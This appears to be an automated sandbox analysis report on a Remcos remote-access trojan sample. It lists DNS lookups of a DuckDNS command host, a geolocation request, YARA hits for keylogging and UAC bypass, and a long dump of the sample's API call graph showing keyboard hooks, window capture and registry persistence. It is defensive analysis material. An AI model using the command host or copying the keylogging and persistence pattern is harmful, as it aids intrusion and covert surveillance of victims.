Nov 21, 2024 01:07:04.523593903 CET | 192.168.2.5 | 1.1.1.1 | 0x2164 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 21, 2024 01:07:02.028549910 CET | 1.1.1.1 | 192.168.2.5 | 0x4c9c | No error (0) | remcos2025rem.duckdns.org | | 186.169.34.190 | A (IP address) | IN (0x0001) | false
Nov 21, 2024 01:07:04.752619982 CET | 1.1.1.1 | 192.168.2.5 | 0x2164 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                        • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 178.237.33.50 | 80 | 5000 | C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe

Timestamp | Bytes transferred | Direction | Data
Nov 21, 2024 01:07:04.875797033 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Nov 21, 2024 01:07:06.213676929 CET | 1170 | IN | HTTP/1.1 200 OK
date: Thu, 21 Nov 2024 00:07:05 GMT
server: Apache
content-length: 962
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                        Data Ascii: { "geoplugin_request":"8.46.123.75", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Target ID: 0
Start time: 19:07:00
Start date: 20/11/2024
Path: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe"
Imagebase: 0x400000
File size: 494'592 bytes
MD5 hash: 3CC6B6EF2D90A55B3A9CB4B2F9C1526C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000000.2025582102.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.4476280877.000000000063E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false

Execution Graph

Execution Coverage: 4.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 21.3%
Total number of Nodes: 1396
Total number of Limit Nodes: 65
execution_graph: serialized node and edge data of the interactive execution-graph widget (rendered as a graph in the report, not as text). Win32 API calls named in the graph nodes: InternetOpenW, InternetOpenUrlW, InternetReadFile, InternetCloseHandle, RtlAllocateHeap, RtlFreeHeap, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetLastError, EnterCriticalSection, LeaveCriticalSection, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetModuleHandleA, GetModuleHandleW, GetModuleFileNameW, GetStartupInfoW, LoadLibraryA, GetProcAddress, FindResourceA, RegOpenKeyExA, RegOpenKeyExW, RegQueryValueExA, RegCreateKeyA, RegSetValueExA, RegDeleteValueW, RegCloseKey, CreateProcessA, CloseHandle, CreateMutexA, CreateThread, StrToIntA, GetComputerNameExW, GetUserNameW, SetProcessDEPPolicy, DeleteFileW, Sleep, GetLocalTime, WSAStartup, WSAGetLastError.
48014 415b0a Sleep 48013->48014 48014->48006 48015 402093 28 API calls 48015->48028 48016 41b580 80 API calls 48016->48028 48019 409097 28 API calls 48019->48028 48020 441ed1 20 API calls 48020->48028 48021 413733 3 API calls 48021->48028 48022 4135e1 31 API calls 48022->48028 48023 40417e 28 API calls 48023->48028 48027 41bc1f 28 API calls 48027->48028 48028->47980 48028->47983 48028->47987 48028->47989 48028->47990 48028->47993 48028->47997 48028->47998 48028->48000 48028->48006 48028->48009 48028->48015 48028->48016 48028->48019 48028->48020 48028->48021 48028->48022 48028->48023 48028->48027 48029 401e65 22 API calls 48028->48029 48628 414f24 48028->48628 48633 40482d 48028->48633 48640 404f51 48028->48640 48655 4048c8 connect 48028->48655 48715 41b871 48028->48715 48718 4145f8 48028->48718 48721 40ddc4 48028->48721 48727 41bcd3 48028->48727 48730 41bdaf 48028->48730 48030 415474 GetTickCount 48029->48030 48031 41bc1f 28 API calls 48030->48031 48037 415491 48031->48037 48033 41bc1f 28 API calls 48033->48037 48035 41bdaf 28 API calls 48035->48037 48037->48033 48037->48035 48039 402ea1 28 API calls 48037->48039 48040 402f10 28 API calls 48037->48040 48041 406383 28 API calls 48037->48041 48043 401fd8 11 API calls 48037->48043 48044 401f09 11 API calls 48037->48044 48734 41bb77 GetLastInputInfo GetTickCount 48037->48734 48735 41bb27 48037->48735 48740 40f90c GetLocaleInfoA 48037->48740 48743 402f31 28 API calls 48037->48743 48744 404c10 48037->48744 48766 404aa1 61 API calls ctype 48037->48766 48039->48037 48040->48037 48041->48037 48043->48037 48044->48037 48047->48006 48923 41ada8 106 API calls 48047->48923 48048->48006 48049->48006 48050->47461 48051->47469 48052->47473 48055 4020df 11 API calls 48054->48055 48056 406c65 48055->48056 48057 4032a0 28 API calls 48056->48057 48058 406c82 48057->48058 48058->47494 48060 40ebdf 48059->48060 48061 4135ae RegQueryValueExA RegCloseKey 48059->48061 48060->47491 48060->47509 48061->48060 48062->47499 48063->47528 
48064->47519 48065->47511 48066->47527 48068 401f86 11 API calls 48067->48068 48069 40da8b 48068->48069 48070 40dae0 48069->48070 48071 40daab 48069->48071 48072 40daa1 48069->48072 48075 41c048 2 API calls 48070->48075 48924 41b645 29 API calls 48071->48924 48074 40dbd4 GetLongPathNameW 48072->48074 48078 40417e 28 API calls 48074->48078 48076 40dae5 48075->48076 48079 40dae9 48076->48079 48080 40db3b 48076->48080 48077 40dab4 48081 401f13 28 API calls 48077->48081 48082 40dbe9 48078->48082 48084 40417e 28 API calls 48079->48084 48083 40417e 28 API calls 48080->48083 48085 40dabe 48081->48085 48086 40417e 28 API calls 48082->48086 48088 40db49 48083->48088 48089 40daf7 48084->48089 48091 401f09 11 API calls 48085->48091 48087 40dbf8 48086->48087 48927 40de0c 28 API calls 48087->48927 48094 40417e 28 API calls 48088->48094 48095 40417e 28 API calls 48089->48095 48091->48072 48092 40dc0b 48928 402fa5 28 API calls 48092->48928 48097 40db5f 48094->48097 48098 40db0d 48095->48098 48096 40dc16 48929 402fa5 28 API calls 48096->48929 48926 402fa5 28 API calls 48097->48926 48925 402fa5 28 API calls 48098->48925 48102 40dc20 48105 401f09 11 API calls 48102->48105 48103 40db6a 48106 401f13 28 API calls 48103->48106 48104 40db18 48107 401f13 28 API calls 48104->48107 48108 40dc2a 48105->48108 48109 40db75 48106->48109 48110 40db23 48107->48110 48111 401f09 11 API calls 48108->48111 48112 401f09 11 API calls 48109->48112 48113 401f09 11 API calls 48110->48113 48114 40dc33 48111->48114 48115 40db7e 48112->48115 48116 40db2c 48113->48116 48117 401f09 11 API calls 48114->48117 48118 401f09 11 API calls 48115->48118 48119 401f09 11 API calls 48116->48119 48120 40dc3c 48117->48120 48118->48085 48119->48085 48121 401f09 11 API calls 48120->48121 48122 40dc45 48121->48122 48123 401f09 11 API calls 48122->48123 48124 40dc4e 48123->48124 48124->47585 48125->47596 48126->47619 48128 413759 RegQueryValueExA RegCloseKey 48127->48128 48129 41377d 48127->48129 48128->48129 48129->47578 
48130->47611 48131->47647 48132->47657 48133->47680 48134->47668 48136->47713 48137->47518 48140 41b556 LoadResource LockResource SizeofResource 48139->48140 48141 40f419 48139->48141 48140->48141 48141->47747 48143 4020b7 28 API calls 48142->48143 48144 406e27 48143->48144 48144->47758 48150 40423a 48145->48150 48148->47780 48149->47761 48151 404243 48150->48151 48152 4023ce 11 API calls 48151->48152 48153 40424e 48152->48153 48154 402569 28 API calls 48153->48154 48155 4041b5 48154->48155 48155->47780 48156->47784 48159 4032aa 48158->48159 48161 4032c9 48159->48161 48162 4028e8 28 API calls 48159->48162 48161->47794 48162->48161 48164 4051fb 48163->48164 48173 405274 48164->48173 48166 405208 48166->47797 48168 402061 48167->48168 48169 4023ce 11 API calls 48168->48169 48170 40207b 48169->48170 48197 40267a 48170->48197 48174 405282 48173->48174 48175 405288 48174->48175 48176 40529e 48174->48176 48184 4025f0 48175->48184 48178 4052f5 48176->48178 48179 4052b6 48176->48179 48194 4028a4 22 API calls 48178->48194 48183 40529c 48179->48183 48193 4028e8 28 API calls 48179->48193 48183->48166 48185 402888 22 API calls 48184->48185 48186 402602 48185->48186 48187 402672 48186->48187 48188 402629 48186->48188 48196 4028a4 22 API calls 48187->48196 48192 40263b 48188->48192 48195 4028e8 28 API calls 48188->48195 48192->48183 48193->48183 48195->48192 48198 40268b 48197->48198 48199 4023ce 11 API calls 48198->48199 48200 40208d 48199->48200 48200->47800 48201->47808 48202->47810 48205 41b362 48204->48205 48206 41c055 GetCurrentProcess IsWow64Process 48204->48206 48208 4135e1 RegOpenKeyExA 48205->48208 48206->48205 48207 41c06c 48206->48207 48207->48205 48209 41360f RegQueryValueExA RegCloseKey 48208->48209 48210 413639 48208->48210 48209->48210 48211 402093 28 API calls 48210->48211 48212 41364e 48211->48212 48212->47821 48213->47829 48215 40b947 48214->48215 48220 402252 48215->48220 48217 40b952 48224 40b967 48217->48224 48219 40b961 48219->47840 48221 4022ac 
48220->48221 48222 40225c 48220->48222 48221->48217 48222->48221 48231 402779 11 API calls std::_Deallocate 48222->48231 48225 40b9a1 48224->48225 48226 40b973 48224->48226 48243 4028a4 22 API calls 48225->48243 48232 4027e6 48226->48232 48230 40b97d 48230->48219 48231->48221 48233 4027ef 48232->48233 48234 402851 48233->48234 48235 4027f9 48233->48235 48245 4028a4 22 API calls 48234->48245 48238 402802 48235->48238 48240 402815 48235->48240 48244 402aea 28 API calls __EH_prolog 48238->48244 48241 402813 48240->48241 48242 402252 11 API calls 48240->48242 48241->48230 48242->48241 48244->48241 48246->47849 48248 402347 48247->48248 48249 402252 11 API calls 48248->48249 48250 4023c7 48249->48250 48250->47849 48252 4024f9 48251->48252 48253 40250a 28 API calls 48252->48253 48254 4020b1 48253->48254 48254->47590 48271 43ba8a 48255->48271 48257 43aed0 48277 43a837 36 API calls 3 library calls 48257->48277 48259 43ae95 48259->48257 48260 43aeaa 48259->48260 48262 43aeaf __cftof 48259->48262 48276 44062d 20 API calls _Atexit 48260->48276 48262->47878 48264 43aedc 48266 43af0b 48264->48266 48278 43bacf 40 API calls __Tolower 48264->48278 48268 43af77 48266->48268 48279 43ba36 20 API calls 2 library calls 48266->48279 48280 43ba36 20 API calls 2 library calls 48268->48280 48269 43b03e _strftime 48269->48262 48281 44062d 20 API calls _Atexit 48269->48281 48272 43baa2 48271->48272 48273 43ba8f 48271->48273 48272->48259 48282 44062d 20 API calls _Atexit 48273->48282 48275 43ba94 __cftof 48275->48259 48276->48262 48277->48264 48278->48264 48279->48268 48280->48269 48281->48262 48282->48275 48289 401fb0 48283->48289 48285 402f1e 48286 402055 11 API calls 48285->48286 48287 402f2d 48286->48287 48287->47892 48288->47895 48290 4025f0 28 API calls 48289->48290 48291 401fbd 48290->48291 48291->48285 48293 40a162 48292->48293 48294 413584 3 API calls 48293->48294 48295 40a169 48294->48295 48296 40a197 48295->48296 48297 40a17d 48295->48297 48313 409097 48296->48313 48299 40a182 
48297->48299 48300 409ed6 48297->48300 48302 409097 28 API calls 48299->48302 48300->47642 48304 40a190 48302->48304 48341 40a268 29 API calls 48304->48341 48306 40a195 48306->48300 48307->47920 48489 403222 48308->48489 48310 403022 48493 403262 48310->48493 48314 4090ad 48313->48314 48315 402252 11 API calls 48314->48315 48316 4090c7 48315->48316 48342 404267 48316->48342 48318 4090d5 48319 40a1b4 48318->48319 48354 40b927 48319->48354 48322 40a205 48325 402093 28 API calls 48322->48325 48323 40a1dd 48324 402093 28 API calls 48323->48324 48326 40a1e7 48324->48326 48327 40a210 48325->48327 48328 41bcef 28 API calls 48326->48328 48329 402093 28 API calls 48327->48329 48330 40a1f5 48328->48330 48331 40a21f 48329->48331 48358 40b19f 31 API calls new 48330->48358 48333 41b580 80 API calls 48331->48333 48335 40a224 CreateThread 48333->48335 48334 40a1fc 48336 401fd8 11 API calls 48334->48336 48337 40a24b CreateThread 48335->48337 48338 40a23f CreateThread 48335->48338 48360 40a2b8 48335->48360 48336->48322 48339 401f09 11 API calls 48337->48339 48366 40a2c4 48337->48366 48338->48337 48363 40a2a2 48338->48363 48340 40a25f 48339->48340 48340->48300 48341->48306 48488 40a2ae 164 API calls 48341->48488 48343 402888 22 API calls 48342->48343 48344 40427b 48343->48344 48345 404290 48344->48345 48346 4042a5 48344->48346 48352 4042df 22 API calls 48345->48352 48348 4027e6 28 API calls 48346->48348 48351 4042a3 48348->48351 48349 404299 48353 402c48 22 API calls 48349->48353 48351->48318 48352->48349 48353->48351 48355 40b930 48354->48355 48356 40a1d2 48354->48356 48359 40b9a7 28 API calls 48355->48359 48356->48322 48356->48323 48358->48334 48359->48356 48369 40a761 48360->48369 48416 40a2f3 48363->48416 48446 40ad11 48366->48446 48370 40a776 Sleep 48369->48370 48390 40a6b0 48370->48390 48372 40a2c1 48373 40a7b6 CreateDirectoryW 48378 40a788 48373->48378 48374 40a7c7 GetFileAttributesW 48374->48378 48375 40a7de SetFileAttributesW 48375->48378 48376 4020df 11 API calls 48388 
40a829 48376->48388 48378->48370 48378->48372 48378->48373 48378->48374 48378->48375 48380 401e65 22 API calls 48378->48380 48378->48388 48403 41c482 48378->48403 48379 40a858 PathFileExistsW 48379->48388 48380->48378 48382 4020b7 28 API calls 48382->48388 48383 40a961 SetFileAttributesW 48383->48378 48384 401fe2 28 API calls 48384->48388 48385 406e13 28 API calls 48385->48388 48386 401fd8 11 API calls 48386->48388 48388->48376 48388->48379 48388->48382 48388->48383 48388->48384 48388->48385 48388->48386 48389 401fd8 11 API calls 48388->48389 48413 41c516 32 API calls 48388->48413 48414 41c583 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48388->48414 48389->48378 48391 40a75d 48390->48391 48394 40a6c6 48390->48394 48391->48378 48392 40a6e5 CreateFileW 48393 40a6f3 GetFileSize 48392->48393 48392->48394 48393->48394 48395 40a728 CloseHandle 48393->48395 48394->48392 48394->48395 48396 40a73a 48394->48396 48397 40a716 48394->48397 48398 40a71d Sleep 48394->48398 48395->48394 48396->48391 48400 409097 28 API calls 48396->48400 48415 40b117 84 API calls 48397->48415 48398->48395 48401 40a756 48400->48401 48402 40a1b4 125 API calls 48401->48402 48402->48391 48404 41c495 CreateFileW 48403->48404 48406 41c4d2 48404->48406 48407 41c4ce 48404->48407 48408 41c4f2 WriteFile 48406->48408 48409 41c4d9 SetFilePointer 48406->48409 48407->48378 48411 41c505 48408->48411 48412 41c507 CloseHandle 48408->48412 48409->48408 48410 41c4e9 CloseHandle 48409->48410 48410->48407 48411->48412 48412->48407 48413->48388 48414->48388 48415->48398 48417 40a30c GetModuleHandleA SetWindowsHookExA 48416->48417 48418 40a36e GetMessageA 48416->48418 48417->48418 48419 40a328 GetLastError 48417->48419 48420 40a380 TranslateMessage DispatchMessageA 48418->48420 48421 40a2ab 48418->48421 48431 41bc1f 48419->48431 48420->48418 48420->48421 48437 441ed1 48431->48437 48434 402093 28 API calls 48435 40a339 48434->48435 48436 4052fd 28 API calls 48435->48436 48438 441edd 48437->48438 48441 
441ccd 48438->48441 48440 41bc43 48440->48434 48442 441ce4 48441->48442 48444 441d1b __cftof 48442->48444 48445 44062d 20 API calls _Atexit 48442->48445 48444->48440 48445->48444 48453 40ad1f 48446->48453 48447 40a2cd 48448 40ad79 Sleep GetForegroundWindow GetWindowTextLengthW 48450 40b93f 28 API calls 48448->48450 48450->48453 48453->48447 48453->48448 48455 41bb77 GetLastInputInfo GetTickCount 48453->48455 48456 40adbf GetWindowTextW 48453->48456 48458 401f09 11 API calls 48453->48458 48459 40af17 48453->48459 48460 40b927 28 API calls 48453->48460 48462 40ae84 Sleep 48453->48462 48463 441ed1 20 API calls 48453->48463 48465 402093 28 API calls 48453->48465 48469 403014 28 API calls 48453->48469 48470 406383 28 API calls 48453->48470 48472 40ae0c 48453->48472 48473 40a671 12 API calls 48453->48473 48474 41bcef 28 API calls 48453->48474 48475 401fd8 11 API calls 48453->48475 48476 43445a EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 48453->48476 48477 401f86 48453->48477 48481 434801 23 API calls __onexit 48453->48481 48482 43441b SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 48453->48482 48483 40907f 28 API calls 48453->48483 48485 40b9b7 28 API calls 48453->48485 48486 40b783 40 API calls 2 library calls 48453->48486 48487 4052fd 28 API calls 48453->48487 48455->48453 48456->48453 48458->48453 48461 401f09 11 API calls 48459->48461 48460->48453 48461->48447 48462->48453 48463->48453 48465->48453 48468 409097 28 API calls 48468->48472 48469->48453 48470->48453 48472->48453 48472->48468 48484 40b19f 31 API calls new 48472->48484 48473->48453 48474->48453 48475->48453 48478 401f8e 48477->48478 48479 402252 11 API calls 48478->48479 48480 401f99 48479->48480 48480->48453 48481->48453 48482->48453 48483->48453 48484->48472 48485->48453 48486->48453 48490 40322e 48489->48490 48499 403618 48490->48499 48492 40323b 48492->48310 48494 40326e 48493->48494 48495 402252 11 API 
calls 48494->48495 48496 403288 48495->48496 48497 402336 11 API calls 48496->48497 48498 403031 48497->48498 48498->47925 48500 403626 48499->48500 48501 403644 48500->48501 48502 40362c 48500->48502 48504 40365c 48501->48504 48505 40369e 48501->48505 48510 4036a6 28 API calls 48502->48510 48506 403642 48504->48506 48509 4027e6 28 API calls 48504->48509 48511 4028a4 22 API calls 48505->48511 48506->48492 48509->48506 48510->48506 48513 404186 48512->48513 48514 402252 11 API calls 48513->48514 48515 404191 48514->48515 48523 4041bc 48515->48523 48518 4042fc 48534 404353 48518->48534 48520 40430a 48521 403262 11 API calls 48520->48521 48522 404319 48521->48522 48522->47933 48524 4041c8 48523->48524 48527 4041d9 48524->48527 48526 40419c 48526->48518 48528 4041e9 48527->48528 48529 404206 48528->48529 48530 4041ef 48528->48530 48531 4027e6 28 API calls 48529->48531 48532 404267 28 API calls 48530->48532 48533 404204 48531->48533 48532->48533 48533->48526 48535 40435f 48534->48535 48538 404371 48535->48538 48537 40436d 48537->48520 48539 40437f 48538->48539 48540 404385 48539->48540 48541 40439e 48539->48541 48604 4034e6 28 API calls 48540->48604 48542 402888 22 API calls 48541->48542 48543 4043a6 48542->48543 48545 404419 48543->48545 48546 4043bf 48543->48546 48605 4028a4 22 API calls 48545->48605 48548 4027e6 28 API calls 48546->48548 48557 40439c 48546->48557 48548->48557 48557->48537 48604->48557 48612 43ab1a 48606->48612 48610 4138ca RegSetValueExA RegCloseKey 48609->48610 48611 4138f4 48609->48611 48610->48611 48611->47952 48615 43aa9b 48612->48615 48614 40170d 48614->47950 48616 43aaaa 48615->48616 48617 43aabe 48615->48617 48621 44062d 20 API calls _Atexit 48616->48621 48620 43aaaf __alldvrm __cftof 48617->48620 48622 4489d7 11 API calls 2 library calls 48617->48622 48620->48614 48621->48620 48622->48620 48626 41b98a ctype ___scrt_get_show_window_mode 48623->48626 48624 402093 28 API calls 48625 414f84 48624->48625 48625->47958 48626->48624 48627->47975 
48629 414f33 48628->48629 48630 414f3d getaddrinfo WSASetLastError 48628->48630 48769 414dc1 29 API calls ___std_exception_copy 48629->48769 48630->48028 48632 414f38 48632->48630 48634 404846 socket 48633->48634 48635 404839 48633->48635 48637 404860 CreateEventW 48634->48637 48638 404842 48634->48638 48770 40489e WSAStartup 48635->48770 48637->48028 48638->48028 48639 40483e 48639->48634 48639->48638 48641 404f65 48640->48641 48642 404fea 48640->48642 48643 404f6e 48641->48643 48644 404fc0 CreateEventA CreateThread 48641->48644 48645 404f7d GetLocalTime 48641->48645 48642->48028 48643->48644 48644->48642 48772 405150 48644->48772 48646 41bc1f 28 API calls 48645->48646 48647 404f91 48646->48647 48771 4052fd 28 API calls 48647->48771 48656 404a1b 48655->48656 48657 4048ee 48655->48657 48658 404a21 WSAGetLastError 48656->48658 48659 40497e 48656->48659 48657->48659 48661 40531e 28 API calls 48657->48661 48679 404923 48657->48679 48658->48659 48660 404a31 48658->48660 48659->48028 48662 404a36 48660->48662 48667 404932 48660->48667 48664 40490f 48661->48664 48781 41cb72 30 API calls 48662->48781 48668 402093 28 API calls 48664->48668 48666 40492b 48666->48667 48670 404941 48666->48670 48671 402093 28 API calls 48667->48671 48673 40491e 48668->48673 48669 404a40 48782 4052fd 28 API calls 48669->48782 48681 404950 48670->48681 48682 404987 48670->48682 48672 404a80 48671->48672 48675 402093 28 API calls 48672->48675 48676 41b580 80 API calls 48673->48676 48678 404a8f 48675->48678 48676->48679 48683 41b580 80 API calls 48678->48683 48776 420cf1 27 API calls 48679->48776 48686 402093 28 API calls 48681->48686 48778 421ad1 54 API calls 48682->48778 48683->48659 48689 40495f 48686->48689 48688 40498f 48692 4049c4 48688->48692 48693 404994 48688->48693 48690 402093 28 API calls 48689->48690 48694 40496e 48690->48694 48780 420e97 28 API calls 48692->48780 48697 402093 28 API calls 48693->48697 48698 41b580 80 API calls 48694->48698 48700 4049a3 48697->48700 48701 404973 
48698->48701 48699 4049cc 48702 4049f9 CreateEventW CreateEventW 48699->48702 48704 402093 28 API calls 48699->48704 48703 402093 28 API calls 48700->48703 48777 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48701->48777 48702->48659 48705 4049b2 48703->48705 48707 4049e2 48704->48707 48708 41b580 80 API calls 48705->48708 48710 402093 28 API calls 48707->48710 48709 4049b7 48708->48709 48779 421143 52 API calls 48709->48779 48712 4049f1 48710->48712 48713 41b580 80 API calls 48712->48713 48714 4049f6 48713->48714 48714->48702 48783 41b847 GlobalMemoryStatusEx 48715->48783 48717 41b886 48717->48028 48784 4145bb 48718->48784 48722 40dde0 48721->48722 48723 41353a 3 API calls 48722->48723 48724 40dde7 48723->48724 48725 413584 3 API calls 48724->48725 48726 40ddff 48724->48726 48725->48726 48726->48028 48728 4020b7 28 API calls 48727->48728 48729 41bce8 48728->48729 48729->48028 48731 41bdbc 48730->48731 48732 4020b7 28 API calls 48731->48732 48733 41bdce 48732->48733 48733->48028 48734->48037 48736 436f10 ___scrt_get_show_window_mode 48735->48736 48737 41bb46 GetForegroundWindow GetWindowTextW 48736->48737 48738 40417e 28 API calls 48737->48738 48739 41bb70 48738->48739 48739->48037 48741 402093 28 API calls 48740->48741 48742 40f931 48741->48742 48742->48037 48743->48037 48745 4020df 11 API calls 48744->48745 48746 404c27 48745->48746 48747 4020df 11 API calls 48746->48747 48755 404c30 48747->48755 48748 43bda0 new 21 API calls 48748->48755 48750 404c96 48752 404ca1 48750->48752 48750->48755 48751 4020b7 28 API calls 48751->48755 48835 404e26 99 API calls 48752->48835 48753 401fe2 28 API calls 48753->48755 48755->48748 48755->48750 48755->48751 48755->48753 48757 401fd8 11 API calls 48755->48757 48822 404cc3 48755->48822 48834 404b96 57 API calls 48755->48834 48756 404ca8 48758 401fd8 11 API calls 48756->48758 48757->48755 48759 404cb1 48758->48759 48760 401fd8 11 API calls 48759->48760 48761 404cba 48760->48761 48761->48006 48763->48028 
48764->48006 48766->48037 48767->48006 48768->48006 48769->48632 48770->48639 48775 40515c 102 API calls 48772->48775 48774 405159 48775->48774 48776->48666 48777->48659 48778->48688 48779->48701 48780->48699 48781->48669 48783->48717 48787 41458e 48784->48787 48788 4145a3 ___scrt_initialize_default_local_stdio_options 48787->48788 48791 43f7ed 48788->48791 48794 43c540 48791->48794 48795 43c580 48794->48795 48796 43c568 48794->48796 48795->48796 48798 43c588 48795->48798 48816 44062d 20 API calls _Atexit 48796->48816 48817 43a837 36 API calls 3 library calls 48798->48817 48800 43c598 48818 43ccc6 20 API calls 2 library calls 48800->48818 48801 43c56d __cftof 48809 43502b 48801->48809 48804 4145b1 48804->48028 48805 43c610 48819 43d334 51 API calls 3 library calls 48805->48819 48808 43c61b 48820 43cd30 20 API calls _free 48808->48820 48810 435036 IsProcessorFeaturePresent 48809->48810 48811 435034 48809->48811 48813 435078 48810->48813 48811->48804 48821 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 48813->48821 48815 43515b 48815->48804 48816->48801 48817->48800 48818->48805 48819->48808 48820->48801 48821->48815 48823 4020df 11 API calls 48822->48823 48833 404cde 48823->48833 48824 404e13 48825 401fd8 11 API calls 48824->48825 48826 404e1c 48825->48826 48826->48750 48827 401fe2 28 API calls 48827->48833 48828 401fd8 11 API calls 48828->48833 48829 4020f6 28 API calls 48829->48833 48830 401fc0 28 API calls 48831 404dad CreateEventA CreateThread WaitForSingleObject CloseHandle 48830->48831 48831->48833 48836 415b25 48831->48836 48832 4041a2 28 API calls 48832->48833 48833->48824 48833->48827 48833->48828 48833->48829 48833->48830 48833->48832 48834->48755 48835->48756 48837 4020f6 28 API calls 48836->48837 48838 415b47 SetEvent 48837->48838 48839 415b5c 48838->48839 48840 4041a2 28 API calls 48839->48840 48841 415b76 48840->48841 48842 4020f6 28 API calls 48841->48842 48843 415b86 48842->48843 48844 4020f6 28 API 
